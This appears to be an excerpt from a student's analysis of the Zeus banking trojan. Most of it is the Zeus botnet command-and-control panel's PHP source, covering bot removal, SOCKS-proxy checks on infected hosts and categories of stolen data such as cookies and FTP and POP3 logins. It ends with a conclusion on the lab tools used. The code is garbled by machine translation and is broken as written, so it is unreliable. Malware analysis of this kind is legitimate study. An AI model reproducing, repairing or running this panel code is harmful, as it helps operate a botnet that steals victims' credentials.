$ Bot_l = mb_strtolower (urldecode ($ bot));

$ Bot = $ botnet .'/'.$ bot;

foreach ($ blist as $ l) {

if (strcmp ($ bot_l, mb_strtolower ($ l)) === 0)

{ if (ClearPath ($ bot)) $ t = str_replace ('{TEXT}', LNG_BA_REMOVE_FREMOVED, THEME_STRING_SUCCESS);

else $ t = str_replace ('{TEXT}', LNG_BA_REMOVE_FERROR, THEME_STRING_ERROR);

$ Item = ($ i% 2? THEME_LIST_ITEM_LTEXT_U2: THEME_LIST_ITEM_LTEXT_U1);

$ Data .=


str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ bot)), $ item). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ t), $ item).

THEME_LIST_ROW_END;

$ I + +;

}

} }

unset ($ bots);

} unset ($ botnets);

}

unset ($ root); }

}

else $ data .= THEME_LIST_ROW_BEGIN.str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', LNG_BA_REMOVE_ABORTED), THEME_LIST_ITEM_LTEXT_U1). THEME_LIST_ROW_END;

ThemeSmall (LNG_BA_REMOVE_TITLE, $ data.THEME_LIST_END, 0, 0, 0);

}

else

{ $ Bl ='';

foreach ($ blist as $ bot) $ bl .= '& bots []='. addjsslashes (urlencode ($ bot));

$ Q = sprintf (strcmp ($ ba, 'remove') === 0? LNG_BA_REMOVE_Q1: LNG_BA_REMOVE_Q2, count ($ blist));

$ Js = "function qr () {var r = confirm ('". Addjsslashes ($ q )."')?' Yes ':' no '; window.location =' ". Addjsslashes

(QUERY_SCRIPT)."? Botsaction = {$ ba} {$ bl} & '+ r;} "; ThemeSmall (LNG_BA_REMOVE_TITLE,'', $ js, 0, 'onload = "qr ()"');

}

} else if (strcmp ($ ba, 'port_socks') === 0)

{

/ / Check if the socks. if (isset ($ _GET ['ipv4']) & & isset ($ _GET ['port']))

{

$ Ok = 0; if (($ s = @ fsockopen ($ _GET ['ipv4'], $ _GET ['port'], $ errn, $ errs, 5)))

{

@ Stream_set_timeout ($ s, 5); $ Data = pack ('CCSL', 4, 1, 0, 0). "\ 0" / / Header Socks4.

if (@ fwrite ($ s, $ data) & & ($ data = @ fread ($ s, 8)) & & strlen ($ data) == 8) $ ok = 1;

fclose ($ s); }

if ($ ok == 1) echo str_replace ('{TEXT}', LNG_BA_PORT_SOCKS_SUCCESS, THEME_STRING_SUCCESS); else echo str_replace ('{TEXT}', LNG_BA_PORT_SOCKS_FAILED, THEME_STRING_ERROR);

die (); }

/ / Display the list.

if (! ($ r = @ mysql_query ('SELECT bot_id, country, ipv4, port_s1 FROM botnet_list WHERE'. $ sql_blist))) ThemeMySQLError

();

/ / Get the result.

$ Res = array ();

while (($ m = @ mysql_fetch_row ($ r))) $ res [$ m [0]] = $ m;

mysql_free_result ($ r);

unset ($ m);

$ Data =

str_replace ('{WIDTH}', 'auto', THEME_LIST_BEGIN). str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (3, LNG_BA_PORT_SOCKS_TITLE), THEME_LIST_TITLE);

$ I = 0; $ Jslist ='';

/ / Display the result.

foreach ($ blist as $ bot)

{ $ Is_exists = isset ($ res [$ bot]);

$ Item = ((($ i + +)% 2 == 0)? THEME_LIST_ITEM_LTEXT_U1: THEME_LIST_ITEM_LTEXT_U2);

if ($ is_exists)

{

$ L = $ res [$ bot]; $ Jslist .= ($ jslist ==''?'': ',')."[' St {$ i}', '". Addjsslashes (urlencode ($ l [2 ]))."','" . addjsslashes (urlencode ($ l [3 ]))."']";

}

$ Data .=


str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', BotPopupMenu ($ bot, 'botmenu'). '/'. ($ is_exists? $ l [1]: '- ')), $ item). str_replace (array ('{WIDTH}', '{TEXT}'), array ('150px ', $ is_exists? htmlentities_ex ($ l [2 ].':'.$ l [3]):'-:-' ), $ item).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('150px ',

$ Is_exists? str_replace ('{ID}', 'st'. $ i, THEME_STRING_ID_BEGIN).

LNG_BA_PORT_SOCKS_CHECKING.THEME_STRING_ID_END:

LNG_BA_PORT_SOCKS_FAILED

), $ Item).

THEME_LIST_ROW_END;

}

/ / Script for checking proxies.

$ Ajax_err = addjsslashes (str_replace ('{TEXT}', LNG_BA_PORT_SOCKS_ERROR, THEME_STRING_ERROR)); $ Ajax_init = JSXMLHttpRequest ('sockshttp');

$ Q = addjsslashes (QUERY_SCRIPT. '? Botsaction = port_socks & bots [] = 0');

$ Ajax = <<<JS_SCRIPT

var sockslist = [{$ jslist}];

var sockshttp = false;

function StateChange (i) {if (sockshttp.readyState == 4)

{ var el = document.getElementById (sockslist [i] [0]);

if (sockshttp.status == 200 & & sockshttp.responseText.length> 5) el.innerHTML = sockshttp.responseText;

else el.innerHTML = '{$ ajax_err}'; SocksCheck (+ + i);

}}

function SocksCheck (i)

{

if (sockshttp) delete sockshttp; if (i <sockslist.length)

{

{$ Ajax_init} if (sockshttp)

{

sockshttp.onreadystatechange = function () {StateChange (i)}; sockshttp.open ('GET', '{$ q} & ipv4 =' + sockslist [i] [1] + '& port =' + sockslist [i] [2], true);

sockshttp.send (null); }

}

} JS_SCRIPT;

ThemeSmall (LNG_BA_PORT_SOCKS_TITLE, $ data.THEME_LIST_END, $ ajax, GetBotJSMenu ('botmenu'), 'onload =

"SocksCheck (0 );"');

}

else if (strcmp ($ ba, 'newscript') === 0) {

foreach ($ blist as $ k => $ v) if (spacechars_exists ($ v)) $ blist [$ k] ='"'.$ v. '"';

header ('Location:'. QUERY_STRING_BLANK. 'botnet_scripts & new =- 1 & bots ='. urlencode (implode ('', $ blist))); die ();

}

die ();

}

////////////////////////////////////////////////// /////////////////////////////

/ / Start the module. ////////////////////////////////////////////////// /////////////////////////////

/ / Select the name of the module and removing unnecessary menu items. $ Needed_module = (empty ($ _GET [QUERY_VAR_MODULE])?'': $ _GET [QUERY_VAR_MODULE]);

$ Curmodule ='';

OptimizeMenu ($ _MAINMENU, true);

foreach ($ _MAINMENU as $ key => $ item) if ($ item [0]! == 0 & & (strcmp ($ needed_module, $ item [0]) === 0 | | $ curmodule

=='')) $ curmodule = $ item [0]; if ($ curmodule =='') die ('Modules for current user not defined.');

define ('CURRENT_MODULE', $ curmodule); / / The current module. define ('FORM_CURRENT_MODULE', str_replace (array ('{NAME}', '{VALUE}'), array ('m', $ curmodule),

THEME_FORM_VALUE)); / / parameter of the current module for the form.

define ('QUERY_STRING', QUERY_STRING_BLANK.CURRENT_MODULE); / / query string for the current module. define ('QUERY_STRING_HTML', QUERY_STRING_BLANK_HTML.CURRENT_MODULE); / / query string for the current

module in HTML format.

unset ($ needed_module, $ curmodule);

/ / Load language module.

if (! file_exists ('system /'. CURRENT_MODULE. '. lng .'.$_ USER_DATA [' language'].'. php'))$_ USER_DATA ['language'] = DEFAULT_LANGUAGE;

require_once ('system /'. CURRENT_MODULE. '. lng .'.$_ USER_DATA [' language'].'. php ');

/ / Start the module.

require_once ('system /'. CURRENT_MODULE. '. php');

die ();

////////////////////////////////////////////////// /////////////////////////////

/ / Functions. ////////////////////////////////////////////////// /////////////////////////////

/ * Getting error with MySQL formotirovaniem HTML and prefix.

Return - string, the error MySQL. * /

function mysql_error_ex ()

{ return 'MySQL error:'. htmlentities_ex (mysql_error ());

}

/ *

Create a temporary file.

IN $ prefix - string, the prefix file.

Return - mixed, a new temporary file name, or false on failure. * /

function CreateTempFile ($ prefix) {

@ Mkdir ('tmp', 0777);

return @ tempnam ('tmp', $ prefix); }

/ *

Adding headers to load the data into a file.

IN $ name - string, the final file name. IN $ size - size of the file.

* /

function HTTPDownloadHeaders ($ name, $ size) {

header ('Content-Type: application / octet-stream');

header ('Content-Disposition: attachment; filename ='. basename_ex ($ name)); header ('Content-Transfer-Encoding: binary');

header ('Content-Length:'. $ size);

HTTPNoCacheHeaders ();

}

/ *

Converting BLT_ * to a string.

IN $ type - int, BLT_ * for the conversion.

Return - string, string representation BLT_ *. * /

function BltToLng ($ type)

{ switch ($ type)

{

case BLT_PROTECTED_STORAGE: return LNG_BLT_PROTECTED_STORAGE; case BLT_COOKIES_IE: return LNG_BLT_COOKIES_IE;

case BLT_FILE: return LNG_BLT_FILE;

case BLT_HTTP_REQUEST: return LNG_BLT_HTTP_REQUEST; case BLT_HTTPS_REQUEST: return LNG_BLT_HTTPS_REQUEST;

case BLT_LOGIN_FTP: return LNG_BLT_LOGIN_FTP;

case BLT_LOGIN_POP3: return LNG_BLT_LOGIN_POP3;

case BLT_GRABBED_UI: return LNG_BLT_GRABBED_UI;

case BLT_GRABBED_HTTP: return LNG_BLT_GRABBED_HTTP;

case BLT_GRABBED_WSOCKET: return LNG_BLT_GRABBED_WSOCKET; case BLT_GRABBED_FTPSOFTWARE: return LNG_BLT_GRABBED_FTPSOFTWARE;

case BLT_GRABBED_OTHER: return LNG_BLT_GRABBED_OTHER;

} return LNG_BLT_UNKNOWN;

}

/ *

Fnmatch substitute for Windows.

IN $ pattern - string, mask.

IN $ string - string, string.

Return - bool, true - in the case of coincidence, or else false.

* /

if (! function_exists ('fnmatch')) {

function fnmatch ($ pattern, $ string)

{ return @ preg_match ('#^'. strtr (preg_quote ($ pattern,'#'), array ('\ \ *' =>'.*', '\ \?' =>'.?')).' $ # i ', $ string);

}

}

/ *

Determines whether suschetvuet, whitespace in the string.

IN $ str - string, the string to check.

Return - true - if whitespace suschetvuet,

false - if the whitespace is not suschetvuet. * /

function spacechars_exists ($ str)

{ return strpbrk ($ str, "\ x20 \ x09 \ x0A \ x0B \ x0D") === false? false: true;

}

/ *

The transformation of a logical expression into an array.

IN $ exp - string, expression.

Return - array, the result. * /

function ExpToArray ($ exp)

{ $ List = array ();

$ Len = strlen ($ exp);

for ($ i = 0; $ i <$ len; $ i + +)

{ $ Cur = ord ($ exp [$ i]);

/ / Skip probelnye characters. if ($ cur == 0x20 | | ($ cur> = 0x9 & & $ cur <= 0xD)) continue;

/ / Check the quotes. if ($ cur == 0x22 | | $ cur == 0x27)

{

for ($ j = $ i + 1; $ j <$ len; $ j + +) if (ord ($ exp [$ j]) == $ cur) {

/ / Count the number of slashes.

$ C = 0; for ($ k = $ j - 1; ord ($ exp [$ k]) == 0x5C; $ k -) $ c + +;

if ($ c% 2 == 0) break; / / For an even number of slashes to quotes, our quotes are not special. symbol.

} if ($ j! = $ len) $ i + +; / / If we do not reach the end, first remove the quotes.

$ Type = 1;

}

/ / Simple copy to the first space.

else {

for ($ j = $ i + 1; $ j <$ len; $ j + +)

{ $ Cur = ord ($ exp [$ j]);

if ($ cur == 0x20 | | ($ cur> = 0x9 & & $ cur <= 0xD)) break;

}

$ Type = 0;

}

$ List [] = array (substr ($ exp, $ i, $ j - $ i), $ type);

$ I = $ j; }

return $ list; }

/ * Comparing strings with a logical expression.

IN $ str - string, string. IN $ exp - string, expression.

IN $ cs - bool, if true, the case-sensitive (BINARY), otherwise insensitive.

IN $ strong - bool, see the code.

Return - true - if the string is suitable for the expression

false - otherwise. * /

function MatchStringInExpString ($ str, $ exp, $ cs, $ strong)

{

$ Exp = trim ($ exp); if ($ exp ==''| | $ exp == '*') return true;

$ List = ExpToArray ($ exp);

/ / Setting pcre.

$ Pcre_pre = ($ strong? '# ^':'#'); $ Pcre_aft = ($ strong? '$ #':'#').($ Cs? 'U': 'iu');

/ / Obrabatyaem result. $ Q_prev = $ q_cur = 0;

$ RetVal = false;

foreach ($ list as $ item)

{

if ($ item [1] == 0)

{

$ Skip = 0; if (strcmp ($ item [0], 'OR') === 0) $ q_cur = 0;

else if (strcmp ($ item [0], 'AND') === 0) $ q_cur = 1;

else if (strcmp ($ item [0], 'NOT') === 0) $ q_cur = 2; else $ skip = 1;

if ($ skip == 0) {$ q_prev = $ q_cur; continue;}

}

/ / Compare.

$ R = preg_match ($ pcre_pre.strtr (preg_quote ($ item [0],'#'), array ('\ \ *' =>'.*', '\ \?' =>'.?')) . $ pcre_aft, $ str);

/ / Not sure of the logic.

switch ($ q_cur) {

case 0: / / OR

if ($ r> 0) $ retVal = true; break;

case 1: / / AND

if ($ r> 0) break;

return false;

case 2: / / NOT

if ($ r> 0) return false;

break; }

}

return $ retVal;

}

/ *

Converting a logical expression in the SQL query to WHERE.

IN $ exp - string, expression.

IN $ column - string, name of the column.

IN $ cs - bool, if true, sensitive, or insensitive. IN $ strong - bool, see the code.

Return - string, query. * /

function ExpToSQL ($ exp, $ column, $ cs, $ strong)

{ $ Exp = trim ($ exp);

if ($ exp ==''| | $ exp == '*') return'';

$ List = ExpToArray ($ exp);

/ / Obrabatyaem result. $ Query ='';

$ Q_addv = '';

foreach ($ list as $ item) {

if ($ item [1] == 0)

{

$ Skip = 0;

if (strcmp ($ item [0], 'OR') === 0) {$ q_cur = 'OR'; $ q_addv = '';}

else if (strcmp ($ item [0], 'AND') === 0) {$ q_cur = 'AND'; $ q_addv = '';} else if (strcmp ($ item [0], 'NOT') === 0) {$ q_cur = 'AND'; $ q_addv = 'NOT';}

else $ skip = 1;

if ($ skip == 0)

{

if ($ q_cur! = $ q_prev & &! empty ($ query)) $ query ='('.$ query .')'; $ Q_prev = $ q_cur;

continue;

}

}

$ S = str_replace (array ('%','_'), array ('\ \ \ \%', '\ \ \ \ _'), $ item [0]);

/ / Substitute Simola *,?. $ Len = strlen ($ s);

for ($ i = 0; $ i <$ len; $ i + +) if (($ c = ord ($ s [$ i])) == 0x2A | | $ c == 0x3F)

{ / / Count the number of slashes.

$ Cc = 0;

for ($ k = $ i - 1; $ k> = 0 & & ord ($ s [$ k]) == 0x5C; $ k -) $ cc + +;

/ / Substitute.

if ($ cc% 2 == 0) $ s [$ i] = $ c == 0x2A? '%': '_'; }

$ S = stripslashes ($ s); if (! $ strong) $ s ='%'.$ s. '%';

$ Query .= (empty ($ query)?'': $ Q_cur). $ Column. $ Q_addv. 'LIKE'. ($ Cs? 'BINARY':'').' \''. Addslashes ($ s). '\'';

}

return'('.$ query .')';

}

/ *

Checks whether the path of sound (otsutvie characters '\', '/', '\ 0').

IN $ str - string, the string to check.

Return - bool, true - if you let a secure, false - if the path is not safe.

* /

function SafePath ($ str) {

return (strpos ($ str, "/") === false & & strpos ($ str, "\ \") === false & & strpos ($ str, "\ 0") === false);

}

/ *

Conclusion login form.

IN $ show_error - bool, whether to display Your Message about incorrect username / password.

* / function ShowLoginForm ($ show_error)

{

$ Page = $ show_error? THEME_STRING_FORM_ERROR_1_BEGIN. 'Bad user name or password.'. THEME_STRING_FORM_ERROR_1_END:'';

$ Page .=

str_replace (array ('{NAME}', '{URL}', '{JS_EVENTS}'), array ('login', QUERY_STRING_BLANK_HTML. 'login',''), THEME_FORMPOST_BEGIN).

str_replace ('{WIDTH}', 'auto', THEME_DIALOG_BEGIN).

str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (2, 'Login'), THEME_DIALOG_TITLE). THEME_DIALOG_ROW_BEGIN.

str_replace ('{COLUMNS_COUNT}', 1, THEME_DIALOG_GROUP_BEGIN). THEME_DIALOG_ROW_BEGIN.

str_replace ('{TEXT}', 'User name:', THEME_DIALOG_ITEM_TEXT).

str_replace (array ('{VALUE}', '{NAME}', '{MAX}', '{WIDTH}'), array ('', 'user', '255 ', '200px'), THEME_DIALOG_ITEM_INPUT_TEXT).

THEME_DIALOG_ROW_END.


str_replace ('{TEXT}', 'Password:', THEME_DIALOG_ITEM_TEXT).

str_replace (array ('{VALUE}', '{NAME}', '{MAX}', '{WIDTH}'), array ('', 'pass', '255 ', '200px'),

THEME_DIALOG_ITEM_INPUT_PASS). THEME_DIALOG_ROW_END.


THEME_DIALOG_ITEM_EMPTY. str_replace (array ('{COLUMNS_COUNT}', '{VALUE}', '{NAME}', '{JS_EVENTS}', '{TEXT}'), array (1, 1, 'remember','',

'Remember (MD5 cookies) '), THEME_DIALOG_ITEM_INPUT_CHECKBOX_2).

THEME_DIALOG_ROW_END. THEME_DIALOG_GROUP_END.

THEME_DIALOG_ROW_END.

str_replace ('{COLUMNS_COUNT}', 2, THEME_DIALOG_ACTIONLIST_BEGIN).

str_replace (array ('{TEXT}', '{JS_EVENTS}'), array ('Submit',''), THEME_DIALOG_ITEM_ACTION_SUBMIT).

THEME_DIALOG_ACTIONLIST_END. THEME_DIALOG_END;

ThemeSmall ('login', $ page.THEME_FORMPOST_END, 0, 0, 0); }

/ * Create a list of available botnets in THEME_DIALOG_ITEM_LISTBOX.

IN $ current_botnet - string, name of the current botnet, or''if a botnet is not defined. IN $ adv_query - additional data in the HTTP-request for change of a botnet.

Return - string, ListBox named 'botnet' button and change the botnet. * /

function BotnetsToListBox ($ current_botnet, $ adv_query)

{ $ Adv_query = htmlentities_ex ($ adv_query);

$ Botnets = str_replace (array ('{NAME}', '{WIDTH}'), array ('botnet', 'auto'), THEME_DIALOG_ITEM_LISTBOX_BEGIN).

Str_replace (array ('{VALUE}', '{TEXT}') , array ('', LNG_BOTNET_ALL), THEME_DIALOG_ITEM_LISTBOX_ITEM);

if (($ r = @ mysql_query ('SELECT DISTINCT botnet FROM botnet_list'))) while (($ m = @ mysql_fetch_row ($ r))) if ($ m [0]!

='')

{ $ Botnets .= str_replace (array ('{VALUE}', '{TEXT}'),

array (htmlentities_ex (urlencode ($ m [0])), htmlentities_ex (mb_substr ($ m [0], 0, BOTNET_MAX_CHARS))),

strcmp ($ current_botnet, $ m [0]) === 0? THEME_DIALOG_ITEM_LISTBOX_ITEM_CUR: THEME_DIALOG_ITEM_LISTBOX_ITEM);

}

$ Botnets .= THEME_DIALOG_ITEM_LISTBOX_END. ''.

str_replace (array ('{TEXT}', '{JS_EVENTS}'),

array (LNG_BOTNET_APPLY, 'onclick = "var botnet = document.getElementById (\' botnet \ '); window.location = \''. QUERY_STRING_HTML. $ adv_query.' & botnet = \ '+ botnet.options [botnet.selectedIndex ]. value ;"'),

THEME_DIALOG_ITEM_ACTION);

return $ botnets; }

/ * Creating a table with spisokm page numbers.

IN $ total_pages - int, kolichetsvo pages. IN $ current_page - int, the current page.

IN $ js - string, JavaScript for the event onclick, where {P} - the page number.

Return - string, a list of pages.

* /

function ShowPageList ($ total_pages, $ current_page, $ js) {

$ List = array ();

$ Visible_pages = 5, / / radius of the visible pages.

/ / We count the visible page. $ Min_visible = $ current_page - $ visible_pages;

$ Max_visible = $ current_page + $ visible_pages;

if ($ min_visible <1) $ max_visible -= $ min_visible - 1, / /! Adds chisilo <1

else if ($ max_visible> $ total_pages) $ min_visible -= ($ max_visible - $ total_pages); / / Reduce the number of which appeared

over $ total_pages.

$ Q_min = false;

$ Q_max = false;

for ($ i = 1; $ i <= $ total_pages; $ i + +)

{ / / Tekschaya page.

if ($ i == $ current_page) $ list [] = array ($ i, 0);

else {

/ / Invisible page.

if ($ i! = 1 & & $ i! = $ total_pages & & ($ i <$ min_visible | | $ i> $ max_visible))

{

if ($ i <$ min_visible & & $ q_min == false) {

$ List [] = array (0, 0);

$ Q_min = true; }

else if ($ i> $ max_visible & & $ q_max == false)

{ $ List [] = array (0, 0);

$ Q_max = true;

} }

/ / Visible pages.

else $ list [] = array ($ i, str_replace ('{P}', $ i, $ js)); }

}

return ThemePageList ($ list,

$ Current_page> 1? str_replace ('{P}', 1, $ js): 0

$ Current_page> 1? str_replace ('{P}', $ current_page - 1, $ js): 0

$ Current_page <$ total_pages? str_replace ('{P}', $ total_pages, $ js): 0

$ Current_page <$ total_pages? str_replace ('{P}', $ current_page + 1, $ js): 0

); }

/ * Creating a menu for JavaScript from $ _BOT_MENU.

IN $ name - string, name of the menu.

Return - string, a JavaScript variable with soedrzhimym menu.

* / function GetBotJSMenu ($ name)

{

global $ _BOT_MENU; $ Output ='';

$ I = 0;

foreach ($ _BOT_MENU as $ item)

{

if ($ i + +! = 0) $ output .= ','; if ($ item [0] === 0) $ output .= '[0]';

else $ output .= '[\''. addjsslashes (htmlentities_ex ($ item [1 ])).' \', \''. addjsslashes (QUERY_SCRIPT_HTML. '? botsaction ='.

htmlentities_ex (urlencode ($ item [0] )).'& bots [] = $ 0 $').' \ ']'; }

return 'var'. $ name. ' = ['. $ Output .'];'; }

/ * Creating popap menu for the bot.

IN $ botid - string, the bot ID. Apply htmlentities_ex or urlencode not.

IN $ meuname - string, name of the menu. Simply put the name in JavaScript permennoy created through GetBotJSMenu.

Return - string, popap menu

* /

function BotPopupMenu ($ botid, $ menuname)

{

if (! isset ($ GLOBALS ['_next_bot_popupmenu__']))$ GLOBALS [' _next_bot_popupmenu__ '] = 100; return str_replace (array ('{ID}', '{MENU_NAME}', '{BOTID_FOR_URL}', '{BOTID}'),

array ($ GLOBALS ['_next_bot_popupmenu__']++, $ menuname, htmlentities_ex (urlencode ($ botid)), htmlentities_ex

($ botid)), THEME_POPUPMENU_BOT);

}

/ *

Sozdnie header column sort to lie.

IN $ text - string, name of the column.

IN $ col_id - int, ID column. IN $ num - bool, true - column is used to display numbers, false - column is used for text output.

Retrurn - string, column. * /

function WriteSortColumn ($ text, $ col_id, $ num)

{ global $ _SORT_ORDER, $ _SORT_COLUMN_ID;

if ($ num) $ theme = $ _SORT_COLUMN_ID == $ col_id? ($ _SORT_ORDER == 0? THEME_LIST_HEADER_R_SORT_CUR_ASC: THEME_LIST_HEADER_R_SORT_CUR_DESC):

THEME_LIST_HEADER_R_SORT;

else $ theme = $ _SORT_COLUMN_ID == $ col_id? ($ _SORT_ORDER == 0? THEME_LIST_HEADER_L_SORT_CUR_ASC: THEME_LIST_HEADER_L_SORT_CUR_DESC): THEME_LIST_HEADER_L_SORT;

return str_replace ( array ('{COLUMNS_COUNT}', '{URL}', '{JS_EVENTS}', '{TEXT}', '{WIDTH}'),

array (1, '#', 'onclick = "return SetSortMode ('. $ col_id. ','.($_ SORT_COLUMN_ID == $ col_id? ($ _SORT_ORDER

== 0? 1: 0): $ _SORT_ORDER).') "', $ text,' auto '),

$ Theme

);

}

/ *

JS code to change the sort order.

IN $ url - string, url.

Retutn - string, js-code.

* /

function JSSetSortMode ($ url) {

return "function SetSortMode (mode, ord) {window.location = '{$ url} & smode =' + mode + '& sord =' + ord; return false;} \ r \ n";

}

/ *

The code for the JS to initialize the XMLHttpRequest.

IN $ var - string, name permennoy for the object.

Retutn - string, js-code.

* /

function JSXMLHttpRequest ($ var) {

return

"Try {{$ var} = new ActiveXObject ('Msxml2.XMLHTTP');}". "Catch (e1)".

"{".

"Try {{$ var} = new ActiveXObject ('Microsoft.XMLHTTP');}". "Catch (e2) {{$ var} = false;}".

"}". "If (! {$ Var} & & typeof XMLHttpRequest! = 'Undefined'){{$ var} = new XMLHttpRequest ();}".

"If (! {$ Var}) alert ('ERROR: Failed to create XMLHttpRequest .');";

}

/ *

JS code for the mass control metakmi type checkbox.

IN $ form - string, name of the form for processing.

IN $ cb - string, the main checkbox. IN $ cb - string, name of dependent checkbox'ov.

Retutn - string, js-code. * /

function JSCheckAll ($ form, $ cb, $ arr)

{ return

"Function CheckAll (){".

"Var bl = document.forms.namedItem ('{$ form}'). Elements;".

"Var ns = bl.namedItem ('{$ cb}'). Checked;".

"For (var i = 0; i <bl.length; i + +) if (bl.item (i). Name == '{$ arr}') bl.item (i). Checked = ns;". "} \ R \ n";

}

/ *

Gets the sort order of the GET-request.

IN $ sm - array, list dosutpnyh sorts.

Return - string, URL of the current kotsovka stortirovki. * /

function AssocateSortMode ($ sm)

{ $ GLOBALS ['_SORT_COLUMN'] = $ sm [0] / / Column

$ GLOBALS ['_SORT_COLUMN_ID'] = 0; / / ID column.

$ GLOBALS ['_SORT_ORDER'] = 0, / / Direction, 0 = ASC, 1 = DESC

if (! empty ($ _GET ['smode']) & & is_numeric ($ _GET ['smode']))

{

if (isset ($ sm [$ _GET ['smode']]))

{

$ GLOBALS ['_SORT_COLUMN'] = $ sm [$ _GET ['smode']]; $ GLOBALS ['_SORT_COLUMN_ID'] = intval ($ _GET ['smode']);

}

}

if (! empty ($ _GET ['sord']) & & is_numeric ($ _GET ['sord']))$ GLOBALS [' _SORT_ORDER '] = $ _GET [' sord '] == 1? 1: 0;

if ($ GLOBALS ['_SORT_COLUMN_ID']! == 0 | | $ GLOBALS ['_SORT_ORDER']! == 0) return '& smode ='. $ GLOBALS

['_SORT_COLUMN_ID'].'& sord ='. $ GLOBALS [' _SORT_ORDER '];

return''; }

/ * Adding data to the current sort of form.

* /

function AddSortModeToForm () {

return str_replace (array ('{NAME}', '{VALUE}'), array ('smode', $ GLOBALS ['_SORT_COLUMN_ID']),

THEME_FORM_VALUE). str_replace (array ('{NAME}', '{VALUE}'), array ('sord', $ GLOBALS ['_SORT_ORDER']), THEME_FORM_VALUE);

}

/ *

Getting a list of all directories.

IN $ path - string, path to search.

Return - array, list diretory, or false otherwise.

* / function getdirs ($ path)

{

$ R = array (); if (($ dh = @ opendir ($ path)) === false) return false;

else

{

while (($ file = @ readdir ($ dh))! == false) if (strcmp ($ file, '.')! == 0 & & strcmp ($ file,'..')! == 0 & & @ is_dir ($ path .'/'.$ file))

$ r [] = $ file;

@ Closedir ($ dh); }

return $ r; }

/ * Deleting files and folders.

IN $ path - string, full path.

Return - true - if the path is successfully removed; false - if an error occurs.

* /

function ClearPath ($ path) {

@ Chmod ($ path, 0777);

if (@ is_dir ($ path))

{

if (($ dh = @ opendir ($ path))! == false) {

while (($ file = readdir ($ dh))! == false) if (strcmp ($ file, '.')! == 0 & & strcmp ($ file,'..')! == 0)

{ if (! ClearPath ($ path .'/'.$ file)) return false;

}

@ Closedir ($ dh); }

if (! @ rmdir ($ path)) return false;

}

else if (is_file ($ path))

{

if (! @ unlink ($ path)) return false; }

return true; }

/ * Otimiziruet menu, removing items from it zapreshennye.

IN OUT $ menu - array, the menu for processing. IN $ allow_fsep - bool, keep the top separator.

* /

function OptimizeMenu (& $ menu, $ save_fsep) {

global $ _USER_DATA;

foreach ($ menu as $ key => $ item) foreach ($ item [2] as $ r) if (empty ($ _USER_DATA [$ r])) {unset ($ menu [$ key]); break;}

/ / Remove unnecessary separators. $ Sep = -1;

$ I = 0;

foreach ($ menu as $ key => $ item) {

if ($ item [0] === 0)

{ if ($ i == 0 & &! $ save_fsep) unset ($ menu [$ key]);

else if ($ sep! == -1) unset ($ menu [$ sep]);

$ Sep = $ key; }

else {

$ Sep = -1;

$ I + +; }

}

if ($ sep! == -1) unset ($ menu [$ sep]);

}

////////////////////////////////////////////////// /////////////////////////////

/ / Session management.

////////////////////////////////////////////////// /////////////////////////////

/ *

Capture Session * /

$ _SESSIONIN = 0;

function LockSession ()

{

global $ _SESSIONIN; if ($ _SESSIONIN == 0)

{

@ Session_set_cookie_params (SESSION_LIVETIME, CP_HTTP_ROOT); @ Session_name (COOKIE_SESSION);

@ Session_start ();

} $ _SESSIONIN + +;

}

/ *

Exemption session

* / function UnlockSession ()

{

global $ _SESSIONIN; if ($ _SESSIONIN> 0 & & - $ _SESSIONIN == 0) session_write_close ();

}

/ *

Destroying session

* / function UnlockSessionAndDestroyAllCokies ()

{

global $ _SESSIONIN; $ _SESSIONIN = 0;

if (isset ($ _SESSION)) foreach ($ _SESSION as $ k => $ v) unset ($ _SESSION [$ k]);

@ Session_unset (); @ Session_destroy ();

@ Setcookie (COOKIE_SESSION,'', 0, CP_HTTP_ROOT); @ Setcookie (COOKIE_USER,'', 0, CP_HTTP_ROOT);

@ Setcookie (COOKIE_PASS,'', 0, CP_HTTP_ROOT);

} ?>

The Answer is to use the zse.exe to see infection and fix it

Conclusion

From the data collection of running the Zeus system configuration for approximately

ten hours there was a noticeable amount of traffic from the impacted infected host to the web

server. The goals were achieved to a level that is satisfactory to answer some basic questions

of what the Zeus does. The questions of how to detect what is going on within the infected

host, what security levels configurations of XP were impacted, how easy Zeus is to setup and

use, and what are the possible countermeasure to use to prevent infection.

From inspection of the Zeus Ŗcp.phpŗ and Ŗgate.phpŗ files along with the Ŗzse.exeŗ

configuration setup file you can see many of the data gathering methods and functions. This

will show evidences of data capturing and that data transfers being made from a host to a web

server. From the Wireshark summary, data transfer of packets is occurring from the infected

host with the web server. Those packets do not insert data into the web server’s MySQL

database however that is a minor detail which doesn’t hamper the intent of this experiment. It

is likely due toa missing php file or a matter of a required help file to correct that missing link.

In the Ŗcp.phpŗ and Ŗgate.phpŗ files it is not hard to see the relationships of data repository

actions that are suppose to take place on the web server.

In the IDA Pro results we see from the Ŗbt.exeŗ and Ŗzse.exeŗ files there are many

functions it will be running on the infected host. Somewhere in the execution of the Ŗbt.exeŗ a

spawn activity occurs to create another executable called Ŗsdra64.exe.ŗ Also the Log (user.ds)

and Config (local.ds) files were generated in a created directory of Ŗlowsecŗ which assist the

data collections process. The output of Promon is a very detailed and shows the actual

changes that occur on the infected host. I experienced a continuous rebooting of the infected

host. It would not enter back into the regular boot process. It would display a blue-screen

error. This is shown in screenshots in during the execution of the attack of the Ŗbt.exeŗ on the

infected host. The conclusions of the characteristics that Dell SecureWorks list can be verified

with the output files InCtrl5 and Procmon. However some claims they made I did not validate

such as FTP and POP accounts being stolen but my system had neither configured.

The tools used to detect this complex Zeus malware program were selected at the

beginning and during the examination of the infected host. The assignments over the

coursework provided the necessary tools and techniques to properly assess the malware

portion running on the infected host. The most useful one was InCtrl5. Promon in junction

with WinMerge Ŗbeforeŗ and Ŗafterŗ shots was very detailed but required a lot of time

compared to InCtl5 which was quick and pretty accurate in recovering all of the correct

information as seen in the media articles. The given malware tool utility Ŗzse.exeŗ will detect

and clean the virus from the infected host. It will show a brief summary of the key files that

are found on infected systems but not everything it causes. The appreciation of how complex

Zeus is can be seen is the dissection of the assembly language code traced by IDA Pro. With

more practice and unlimited amount of time one could describe the code with more precision

than what the other tools were able to report however it would be overkill for this experiment.

IDA Pro would be a nice tool to be a master at when doing this kind of exercise over and over

